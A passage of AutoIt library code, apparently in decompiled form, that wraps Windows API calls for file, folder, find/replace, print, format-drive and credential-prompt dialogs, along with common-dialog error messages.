THEN LOCAL $SPATH = _WINAPI_PATHSEARCHANDQUALIFY ($SROOT , 1 ) IF @ERROR THEN $SPATH = $SROOT ENDIF $PPIDL = _WINAPI_SHELLILCREATEFROMPATH ($SPATH ) IF @ERROR THEN ENDIF ENDIF DLLSTRUCTSETDATA ($TBROWSEINFO , 1 , $HPARENT ) DLLSTRUCTSETDATA ($TBROWSEINFO , 2 , $PPIDL ) DLLSTRUCTSETDATA ($TBROWSEINFO , 3 , DLLSTRUCTGETPTR ($TBROWSEINFO , 10 ) ) DLLSTRUCTSETDATA ($TBROWSEINFO , 4 , DLLSTRUCTGETPTR ($TBROWSEINFO , 9 ) ) DLLSTRUCTSETDATA ($TBROWSEINFO , 5 , $IFLAGS ) DLLSTRUCTSETDATA ($TBROWSEINFO , 6 , $PBROWSEPROC ) DLLSTRUCTSETDATA ($TBROWSEINFO , 7 , $LPARAM ) DLLSTRUCTSETDATA ($TBROWSEINFO , 8 , 0 ) DLLSTRUCTSETDATA ($TBROWSEINFO , 9 , $STEXT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "ptr" , "SHBrowseForFolderW" , "struct*" , $TBROWSEINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) $SRESULT = _WINAPI_SHELLGETPATHFROMIDLIST ($ARET [0 ] ) _WINAPI_COTASKMEMFREE ($ARET [0 ] ) IF $PPIDL THEN _WINAPI_COTASKMEMFREE ($PPIDL ) ENDIF IF NOT $SRESULT THEN RETURN SETERROR (10 , 0 , "" ) RETURN $SRESULT ENDFUNC FUNC _WINAPI_COMMDLGEXTENDEDERROR () LOCAL CONST $CDERR_DIALOGFAILURE = 65535 LOCAL CONST $CDERR_FINDRESFAILURE = 6 LOCAL CONST $CDERR_INITIALIZATION = 2 LOCAL CONST $CDERR_LOADRESFAILURE = 7 LOCAL CONST $CDERR_LOADSTRFAILURE = 5 LOCAL CONST $CDERR_LOCKRESFAILURE = 8 LOCAL CONST $CDERR_MEMALLOCFAILURE = 9 LOCAL CONST $CDERR_MEMLOCKFAILURE = 10 LOCAL CONST $CDERR_NOHINSTANCE = 4 LOCAL CONST $CDERR_NOHOOK = 11 LOCAL CONST $CDERR_NOTEMPLATE = 3 LOCAL CONST $CDERR_REGISTERMSGFAIL = 12 LOCAL CONST $CDERR_STRUCTSIZE = 1 LOCAL CONST $FNERR_BUFFERTOOSMALL = 12291 LOCAL CONST $FNERR_INVALIDFILENAME = 12290 LOCAL CONST $FNERR_SUBCLASSFAILURE = 12289 LOCAL $ARESULT = DLLCALL ("comdlg32.dll" , "dword" , "CommDlgExtendedError" ) IF NOT @ERROR THEN SWITCH $ARESULT [0 ] CASE $CDERR_DIALOGFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The dialog box could not be created." & @LF & "The common dialog box function's call to the DialogBox function failed." & @LF & "For example, this error occurs if the common dialog box call specifies an invalid window handle." ) CASE $CDERR_FINDRESFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to find a specified resource." ) CASE $CDERR_INITIALIZATION RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed during initialization." & @LF & "This error often occurs when sufficient memory is not available." ) CASE $CDERR_LOADRESFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to load a specified resource." ) CASE $CDERR_LOADSTRFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to load a specified string." ) CASE $CDERR_LOCKRESFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to lock a specified resource." ) CASE $CDERR_MEMALLOCFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function was unable to allocate memory for internal structures." ) CASE $CDERR_MEMLOCKFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function was unable to lock the memory associated with a handle." ) CASE $CDERR_NOHINSTANCE RETURN SETERROR ($ARESULT [0 ] , 0 , "The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a corresponding instance handle." ) CASE $CDERR_NOHOOK RETURN SETERROR ($ARESULT [0 ] , 0 , "The ENABLEHOOK flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a pointer to a corresponding hook procedure." ) CASE $CDERR_NOTEMPLATE RETURN SETERROR ($ARESULT [0 ] , 0 , "The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a corresponding template." ) CASE $CDERR_REGISTERMSGFAIL RETURN SETERROR ($ARESULT [0 ] , 0 , "The RegisterWindowMessage function returned an error code when it was called by the common dialog box function." ) CASE $CDERR_STRUCTSIZE RETURN SETERROR ($ARESULT [0 ] , 0 , "The lStructSize member of the initialization structure for the corresponding common dialog box is invalid" ) CASE $FNERR_BUFFERTOOSMALL RETURN SETERROR ($ARESULT [0 ] , 0 , "The buffer pointed to by the lpstrFile member of the OPENFILENAME structure is too small for the file name specified by the user." & @LF & "The first two bytes of the lpstrFile buffer contain an integer value specifying the size, in TCHARs, required to receive the full name." ) CASE $FNERR_INVALIDFILENAME RETURN SETERROR ($ARESULT [0 ] , 0 , "A file name is invalid." ) CASE $FNERR_SUBCLASSFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "An attempt to subclass a list box failed because sufficient memory was not available." ) ENDSWITCH ENDIF RETURN SETERROR (@ERROR , @EXTENDED , "0x" & HEX ($ARESULT [0 ] ) ) ENDFUNC FUNC _WINAPI_COMMDLGEXTENDEDERROREX () LOCAL $ARET = DLLCALL ("comdlg32.dll" , "dword" , "CommDlgExtendedError" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CONFIRMCREDENTIALS ($STARGET , $BCONFIRM ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIConfirmCredentialsW" , "wstr" , $STARGET , "bool" , $BCONFIRM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_FINDTEXTDLG ($HOWNER , $SFINDWHAT = "" , $IFLAGS = 0 , $PFINDPROC = 0 , $LPARAM = 0 ) $__G_PFRBUFFER = __HEAPREALLOC ($__G_PFRBUFFER , 2 * $__G_IFRBUFFERSIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) DLLSTRUCTSETDATA (DLLSTRUCTCREATE ("wchar[" & $__G_IFRBUFFERSIZE & "]" , $__G_PFRBUFFER ) , 1 , STRINGLEFT ($SFINDWHAT , $__G_IFRBUFFERSIZE + 4294967295 ) ) LOCAL $TFR = DLLSTRUCTCREATE ($TAGFINDREPLACE ) DLLSTRUCTSETDATA ($TFR , "Size" , DLLSTRUCTGETSIZE ($TFR ) ) DLLSTRUCTSETDATA ($TFR , "hOwner" , $HOWNER ) DLLSTRUCTSETDATA ($TFR , "hInstance" , 0 ) DLLSTRUCTSETDATA ($TFR , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TFR , "FindWhat" , $__G_PFRBUFFER ) DLLSTRUCTSETDATA ($TFR , "ReplaceWith" , 0 ) DLLSTRUCTSETDATA ($TFR , "FindWhatLen" , $__G_IFRBUFFERSIZE * 2 ) DLLSTRUCTSETDATA ($TFR , "ReplaceWithLen" , 0 ) DLLSTRUCTSETDATA ($TFR , "lParam" , $LPARAM ) DLLSTRUCTSETDATA ($TFR , "Hook" , $PFINDPROC ) DLLSTRUCTSETDATA ($TFR , "TemplateName" , 0 ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "hwnd" , "FindTextW" , "struct*" , $TFR ) IF @ERROR OR NOT $ARET [0 ] THEN LOCAL $IERROR = @ERROR + 30 __HEAPFREE ($__G_PFRBUFFER ) IF ISARRAY ($ARET ) THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) ELSE RETURN SETERROR ($IERROR , @EXTENDED , 0 ) ENDIF ENDIF RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_FLUSHFRBUFFER () IF NOT __HEAPFREE ($__G_PFRBUFFER , 1 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_FORMATDRIVEDLG ($SDRIVE , $IOPTION = 0 , $HPARENT = 0 ) IF NOT ISSTRING ($SDRIVE ) THEN RETURN SETERROR (10 , 0 , 0 ) $SDRIVE = STRINGLEFT (STRINGUPPER (STRINGSTRIPWS ($SDRIVE , $STR_STRIPLEADING ) ) , 1 ) IF NOT $SDRIVE THEN RETURN SETERROR (11 , 0 , 0 ) $SDRIVE = ASC ($SDRIVE ) + 4294967231 IF ($SDRIVE < 0 ) OR ($SDRIVE > 25 ) THEN RETURN SETERROR (12 , 0 , 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "dword" , "SHFormatDrive" , "hwnd" , $HPARENT , "uint" , $SDRIVE , "uint" , 65535 , "uint" , $IOPTION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] < 0 THEN RETURN SETERROR ($ARET [0 ] , 0 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCONNECTEDDLG ($IDLG , $IFLAGS = 0 , $HPARENT = 0 ) IF NOT __DLL ("connect.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) SWITCH $IDLG CASE 0 $IDLG = "GetNetworkConnected" CASE 1 $IDLG = "GetInternetConnected" CASE 2 $IDLG = "GetVPNConnected" CASE ELSE RETURN SETERROR (1 , 0 , 0 ) ENDSWITCH LOCAL $SSTR = "" IF BITAND ($IFLAGS , 1 ) THEN $SSTR &= "-SkipInternetDetection " ENDIF IF BITAND ($IFLAGS , 2 ) THEN $SSTR &= "-SkipExistingConnections " ENDIF IF BITAND ($IFLAGS , 4 ) THEN $SSTR &= "-HideFinishPage " ENDIF LOCAL $ARET = DLLCALL ("connect.dll" , "long" , $IDLG , "hwnd" , $HPARENT , "dword" , 0 , "dword" , 0 , "dword" , 0 , "handle" , 0 , "wstr" , STRINGSTRIPWS ($SSTR , $STR_STRIPTRAILING ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT ($ARET [0 ] = 0 OR $ARET [0 ] = 1 ) THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN NUMBER (NOT $ARET [0 ] ) ENDFUNC FUNC _WINAPI_GETFRBUFFER () RETURN $__G_IFRBUFFERSIZE + 4294967295 ENDFUNC FUNC _WINAPI_GETOPENFILENAME ($STITLE = "" , $SFILTER = "All files (*.*)" , $SINITALDIR = "." , $SDEFAULTFILE = "" , $SDEFAULTEXT = "" , $IFILTERINDEX = 1 , $IFLAGS = 0 , $IFLAGSEX = 0 , $HWNDOWNER = 0 ) LOCAL $VRESULT = __OFNDLG (0 , $STITLE , $SINITALDIR , $SFILTER , $IFILTERINDEX , $SDEFAULTFILE , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , 0 , 0 , $HWNDOWNER ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF BITAND ($IFLAGS , $OFN_ALLOWMULTISELECT ) THEN RETURN __WINAPI_PARSEMULTISELECTFILEDIALOGPATH ($VRESULT ) ELSE RETURN __WINAPI_PARSEFILEDIALOGPATH ($VRESULT ) ENDIF ENDFUNC FUNC _WINAPI_GETSAVEFILENAME ($STITLE = "" , $SFILTER = "All files (*.*)" , $SINITALDIR = "." , $SDEFAULTFILE = "" , $SDEFAULTEXT = "" , $IFILTERINDEX = 1 , $IFLAGS = 0 , $IFLAGSEX = 0 , $HWNDOWNER = 0 ) LOCAL $SRETURN = __OFNDLG (1 , $STITLE , $SINITALDIR , $SFILTER , $IFILTERINDEX , $SDEFAULTFILE , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , 0 , 0 , $HWNDOWNER ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN __WINAPI_PARSEFILEDIALOGPATH ($SRETURN ) ENDFUNC FUNC _WINAPI_MESSAGEBOXCHECK ($ITYPE , $STITLE , $STEXT , $SREGVAL , $IDEFAULT = + 4294967295 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "SHMessageBoxCheckW" , "hwnd" , $HPARENT , "wstr" , $STEXT , "wstr" , $STITLE , "uint" , $ITYPE , "int" , $IDEFAULT , "wstr" , $SREGVAL ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_MESSAGEBOXINDIRECT ($TMSGBOXPARAMS ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "MessageBoxIndirectW" , "struct*" , $TMSGBOXPARAMS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENFILEDLG ($STITLE = "" , $SINITDIR = "" , $SFILTERS = "" , $IDEFAULTFILTER = 0 , $SDEFAULTFILEPATH = "" , $SDEFAULTEXT = "" , $IFLAGS = 0 , $IFLAGSEX = 0 , $POFNPROC = 0 , $PDATA = 0 , $HPARENT = 0 ) LOCAL $SRESULT = __OFNDLG (0 , $STITLE , $SINITDIR , $SFILTERS , $IDEFAULTFILTER , $SDEFAULTFILEPATH , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , $POFNPROC , $PDATA , $HPARENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $SRESULT ENDFUNC FUNC _WINAPI_PAGESETUPDLG (BYREF $TPAGESETUPDLG ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "int" , "PageSetupDlgW" , "struct*" , $TPAGESETUPDLG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PICKICONDLG ($SICON = "" , $IINDEX = 0 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "PickIconDlg" , "hwnd" , $HPARENT , "wstr" , $SICON , "int" , 4096 , "int*" , $IINDEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [2 ] LOCAL $ARES = DLLCALL ("kernel32.dll" , "dword" , "ExpandEnvironmentStringsW" , "wstr" , $ARET [2 ] , "wstr" , "" , "dword" , 4096 ) $ARESULT [0 ] = $ARES [2 ] $ARESULT [1 ] = $ARET [4 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_PRINTDLG (BYREF $TPRINTDLG ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "long" , "PrintDlgW" , "struct*" , $TPRINTDLG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PRINTDLGEX (BYREF $TPRINTDLGEX ) LOCAL $TPDEX = DLLSTRUCTCREATE ($TAGPRINTDLGEX , DLLSTRUCTGETPTR ($TPRINTDLGEX ) ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "long" , "PrintDlgExW" , "struct*" , $TPDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN SETEXTENDED (DLLSTRUCTGETDATA ($TPDEX , "ResultAction" ) , 1 ) ENDFUNC FUNC _WINAPI_REPLACETEXTDLG ($HOWNER , $SFINDWHAT = "" , $SREPLACEWITH = "" , $IFLAGS = 0 , $PREPLACEPROC = 0 , $LPARAM = 0 ) $__G_PFRBUFFER = __HEAPREALLOC ($__G_PFRBUFFER , 4 * $__G_IFRBUFFERSIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR + 100 , @EXTENDED , 0 ) LOCAL $TBUFF = DLLSTRUCTCREATE ("wchar[" & $__G_IFRBUFFERSIZE & "];wchar[" & $__G_IFRBUFFERSIZE & "]" , $__G_PFRBUFFER ) DLLSTRUCTSETDATA ($TBUFF , 1 , STRINGLEFT ($SFINDWHAT , $__G_IFRBUFFERSIZE + 4294967295 ) ) DLLSTRUCTSETDATA ($TBUFF , 2 , STRINGLEFT ($SREPLACEWITH , $__G_IFRBUFFERSIZE + 4294967295 ) ) LOCAL $TFR = DLLSTRUCTCREATE ($TAGFINDREPLACE ) DLLSTRUCTSETDATA ($TFR , "Size" , DLLSTRUCTGETSIZE ($TFR ) ) DLLSTRUCTSETDATA ($TFR , "hOwner" , $HOWNER ) DLLSTRUCTSETDATA ($TFR , "hInstance" , 0 ) DLLSTRUCTSETDATA ($TFR , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TFR , "FindWhat" , DLLSTRUCTGETPTR ($TBUFF , 1 ) ) DLLSTRUCTSETDATA ($TFR , "ReplaceWith" , DLLSTRUCTGETPTR ($TBUFF , 2 ) ) DLLSTRUCTSETDATA ($TFR , "FindWhatLen" , $__G_IFRBUFFERSIZE * 2 ) DLLSTRUCTSETDATA ($TFR , "ReplaceWithLen" , $__G_IFRBUFFERSIZE * 2 ) DLLSTRUCTSETDATA ($TFR , "lParam" , $LPARAM ) DLLSTRUCTSETDATA ($TFR , "Hook" , $PREPLACEPROC ) DLLSTRUCTSETDATA ($TFR , "TemplateName" , 0 ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "hwnd" , "ReplaceTextW" , "struct*" , $TFR ) IF @ERROR OR NOT $ARET [0 ] THEN LOCAL $IERROR = @ERROR __HEAPFREE ($__G_PFRBUFFER ) IF ISARRAY ($ARET ) THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) ELSE RETURN SETERROR ($IERROR , 0 , 0 ) ENDIF ENDIF RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_RESTARTDLG ($STEXT = "" , $IFLAGS = 2 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "RestartDialog" , "hwnd" , $HPARENT , "wstr" , $STEXT , "int" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SAVEFILEDLG ($STITLE = "" , $SINITDIR = "" , $SFILTERS = "" , $IDEFAULTFILTER = 0 , $SDEFAULTFILEPATH = "" , $SDEFAULTEXT = "" , $IFLAGS = 0 , $IFLAGSEX = 0 , $POFNPROC = 0 , $PDATA = 0 , $HPARENT = 0 ) LOCAL $SRESULT = __OFNDLG (1 , $STITLE , $SINITDIR , $SFILTERS , $IDEFAULTFILTER , $SDEFAULTFILEPATH , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , $POFNPROC , $PDATA , $HPARENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $SRESULT ENDFUNC FUNC _WINAPI_SETFRBUFFER ($ICHARS ) $ICHARS = NUMBER ($ICHARS ) IF $ICHARS < 80 THEN $ICHARS = 80 ENDIF $__G_IFRBUFFERSIZE = $ICHARS + 1 RETURN 1 ENDFUNC FUNC _WINAPI_SHELLABOUTDLG ($STITLE , $SNAME , $STEXT , $HICON = 0 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "ShellAboutW" , "hwnd" , $HPARENT , "wstr" , $STITLE & "#" & $SNAME , "wstr" , $STEXT , "handle" , $HICON ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLOPENWITHDLG ($SFILEPATH , $IFLAGS = 0 , $HPARENT = 0 ) LOCAL $TOPENASINFO = DLLSTRUCTCREATE ("ptr;ptr;dword;wchar[" & (STRINGLEN ($SFILEPATH ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TOPENASINFO , 1 , DLLSTRUCTGETPTR ($TOPENASINFO , 4 ) ) DLLSTRUCTSETDATA ($TOPENASINFO , 2 , 0 ) DLLSTRUCTSETDATA ($TOPENASINFO , 3 , $IFLAGS ) DLLSTRUCTSETDATA ($TOPENASINFO , 4 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHOpenWithDialog" , "hwnd" , $HPARENT , "struct*" , $TOPENASINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLSTARTNETCONNECTIONDLG ($SREMOTE = "" , $IFLAGS = 0 , $HPARENT = 0 ) LOCAL $STYPEOFREMOTE = "wstr" IF NOT STRINGSTRIPWS ($SREMOTE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFREMOTE = "ptr" $SREMOTE = 0 ENDIF DLLCALL ("shell32.dll" , "long" , "SHStartNetConnectionDialogW" , "hwnd" , $HPARENT , $STYPEOFREMOTE , $SREMOTE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLUSERAUTHENTICATIONDLG ($SCAPTION , $SMESSAGE , $SUSER , $SPASSWORD , $STARGET , $IFLAGS = 0 , $IERROR = 0 , $BSAVE = FALSE , $HBITMAP = 0 , $HPARENT = 0 ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $TINFO = DLLSTRUCTCREATE ("dword;hwnd;ptr;ptr;ptr;wchar[" & (STRINGLEN ($SMESSAGE ) + 1 ) & "];wchar[" & (STRINGLEN ($SCAPTION ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TINFO , 1 , DLLSTRUCTGETPTR ($TINFO , 6 ) - DLLSTRUCTGETPTR ($TINFO ) ) DLLSTRUCTSETDATA ($TINFO , 2 , $HPARENT ) DLLSTRUCTSETDATA ($TINFO , 3 , DLLSTRUCTGETPTR ($TINFO , 6 ) ) DLLSTRUCTSETDATA ($TINFO , 4 , DLLSTRUCTGETPTR ($TINFO , 7 ) ) DLLSTRUCTSETDATA ($TINFO , 5 , $HBITMAP ) DLLSTRUCTSETDATA ($TINFO , 6 , $SMESSAGE ) DLLSTRUCTSETDATA ($TINFO , 7 , $SCAPTION ) LOCAL $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIPromptForCredentialsW" , "struct*" , $TINFO , "wstr" , $STARGET , "ptr" , 0 , "dword" , $IERROR , "wstr" , $SUSER , "ulong" , 4096 , "wstr" , $SPASSWORD , "ulong" , 4096 , "bool*" , $BSAVE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [3 ] $ARESULT [0 ] = $ARET [5 ] $ARESULT [1 ] = $ARET [7 ] $ARESULT [2 ] = $ARET [9 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_SHELLUSERAUTHENTICATIONDLGEX ($SCAPTION , $SMESSAGE , $SUSER , $SPASSWORD , $IFLAGS = 0 , $IAUTHERROR = 0 , $BSAVE = FALSE , $IPACKAGE = 0 , $HPARENT = 0 ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $TBLOB = 0 , $ARET IF STRINGLEN ($SUSER ) THEN $ARET = DLLCALL ("credui.dll" , "bool" , "CredPackAuthenticationBufferW" , "dword" , 1 , "wstr" , $SUSER , "wstr" , $SPASSWORD , "ptr" , 0 , "dword*" , 0 ) IF @ERROR OR NOT $ARET [5 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) $TBLOB = DLLSTRUCTCREATE ("byte[" & $ARET [5 ] & "]" ) $ARET = DLLCALL ("credui.dll" , "bool" , "CredPackAuthenticationBufferW" , "dword" , 1 , "wstr" , $SUSER , "wstr" , $SPASSWORD , "struct*" , $TBLOB , "dword*" , $ARET [5 ] ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) ENDIF LOCAL $TINFO = DLLSTRUCTCREATE ("dword;hwnd;ptr;ptr;ptr;wchar[" & (STRINGLEN ($SMESSAGE ) + 1 ) & "];wchar[" & (STRINGLEN ($SCAPTION ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TINFO , 1 , DLLSTRUCTGETPTR ($TINFO , 6 ) - DLLSTRUCTGETPTR ($TINFO ) ) DLLSTRUCTSETDATA ($TINFO , 2 , $HPARENT ) DLLSTRUCTSETDATA ($TINFO , 3 , DLLSTRUCTGETPTR ($TINFO , 6 ) ) DLLSTRUCTSETDATA ($TINFO , 4 , DLLSTRUCTGETPTR ($TINFO , 7 ) ) DLLSTRUCTSETDATA ($TINFO , 5 , 0 ) DLLSTRUCTSETDATA ($TINFO , 6 , $SMESSAGE ) DLLSTRUCTSETDATA ($TINFO , 7 , $SCAPTION ) $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIPromptForWindowsCredentialsW" , "struct*" , $TINFO , "dword" , $IAUTHERROR , "ulong*" , $IPACKAGE , "struct*" , $TBLOB , "ulong" , DLLSTRUCTGETSIZE ($TBLOB ) , "ptr*" , 0 , "ulong*" , 0 , "bool*" , $BSAVE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (30 , $ARET [0 ] , 0 ) LOCAL $ARESULT [4 ] , $IERROR = 0 $ARESULT [2 ] = $ARET [8 ] $ARESULT [3 ] = $ARET [3 ] LOCAL $PBLOB = $ARET [6 ] LOCAL $ISIZE = $ARET [7 ] $ARET = DLLCALL ("credui.dll" , "bool" , "CredUnPackAuthenticationBufferW" , "dword" , 1 , "ptr" , $PBLOB , "dword" , $ISIZE , "wstr" , "" , "dword*" , 4096 , "wstr" , "" , "dword*" , 4096 , "wstr" , "" , "dword*" , 4096 ) IF NOT @ERROR AND $ARET [0 ] THEN $ARESULT [0 ] = $ARET [4 ] $ARESULT [1 ] = $ARET [8 ] ELSE $IERROR = @ERROR + 40 ENDIF IF NOT _WINAPI_ZEROMEMORY ($PBLOB , $ISIZE ) THEN ENDIF _WINAPI_COTASKMEMFREE ($PBLOB ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) RETURN $ARESULT ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __OFNDLG ($IDLG , $STITLE , $SINITDIR , $SFILTERS , $IDEFFILTER , $SDEFFILE , $SDEFEXT , $IFLAGS , $IFLAGSEX , $POFNPROC , $PDATA , $HPARENT ) LOCAL $TBUFFER = DLLSTRUCTCREATE ("wchar[32768]" ) LOCAL $TFILTERS = 0 , $TDEFEXT = 0 , $TINITDIR = 0 , $TTITLE = 0 LOCAL $TOFN = DLLSTRUCTCREATE ($TAGOPENFILENAME ) DLLSTRUCTSETDATA ($TOFN , "StructSize" , DLLSTRUCTGETSIZE ($TOFN ) ) DLLSTRUCTSETDATA ($TOFN , "hwndOwner" , $HPARENT ) DLLSTRUCTSETDATA ($TOFN , 3 , 0 ) LOCAL $ADATA = STRINGSPLIT ($SFILTERS , "|" ) LOCAL $AFILTERS [$ADATA [0 ] * 2 ] LOCAL $ICOUNT = 0 FOR $I = 1 TO $ADATA [0 ] $AFILTERS [$ICOUNT + 0 ] = STRINGSTRIPWS ($ADATA [$I ] , $STR_STRIPLEADING + $STR_STRIPTRAILING ) $AFILTERS [$ICOUNT + 1 ] = STRINGSTRIPWS (STRINGREGEXPREPLACE ($ADATA [$I ] , ".*\((.*)\)" , "\1" ) , $STR_STRIPALL ) IF $AFILTERS [$ICOUNT + 1 ] THEN $ICOUNT += 2 ENDIF NEXT IF $ICOUNT THEN $TFILTERS = _WINAPI_ARRAYTOSTRUCT ($AFILTERS , 0 , $ICOUNT + 4294967295 ) IF @ERROR THEN ENDIF ENDIF DLLSTRUCTSETDATA ($TOFN , "lpstrFilter" , DLLSTRUCTGETPTR ($TFILTERS ) ) DLLSTRUCTSETDATA ($TOFN , 5 , 0 ) DLLSTRUCTSETDATA ($TOFN , 6 , 0 ) DLLSTRUCTSETDATA ($TOFN , "nFilterIndex" , $IDEFFILTER ) $SDEFFILE = STRINGSTRIPWS ($SDEFFILE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $SDEFFILE THEN DLLSTRUCTSETDATA ($TBUFFER , 1 , $SDEFFILE ) ENDIF DLLSTRUCTSETDATA ($TOFN , "lpstrFile" , DLLSTRUCTGETPTR ($TBUFFER ) ) DLLSTRUCTSETDATA ($TOFN , "nMaxFile" , 32768 ) DLLSTRUCTSETDATA ($TOFN , 10 , 0 ) DLLSTRUCTSETDATA ($TOFN , 11 , 0 ) $SINITDIR = STRINGSTRIPWS ($SINITDIR , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $SINITDIR THEN $TINITDIR = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($SINITDIR ) + 1 ) & 